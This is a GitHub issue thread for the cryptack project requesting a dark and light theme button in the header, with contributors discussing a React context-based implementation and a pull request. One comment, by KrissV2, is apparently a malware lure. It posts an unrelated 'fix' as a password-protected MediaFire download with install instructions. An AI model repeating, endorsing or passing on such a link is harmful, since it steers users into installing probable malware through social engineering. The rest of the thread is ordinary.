### ISSUE TITLE
Add dark and light theme

### ISSUE THREAD

**Issue by AkashJana18** [AkashJana18/cryptack#2]
Add dark and light theme.
The theme button should be on the header.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ahaandesai27** [comment]
Hey, im working on this issue. WIll use react's context API to globally control the theme.

**Comment by LucioPalmucci** [comment]
@AkashJana18 I want to help with this

**Comment by ahaandesai27** [comment]
Created a pull request for this issue.
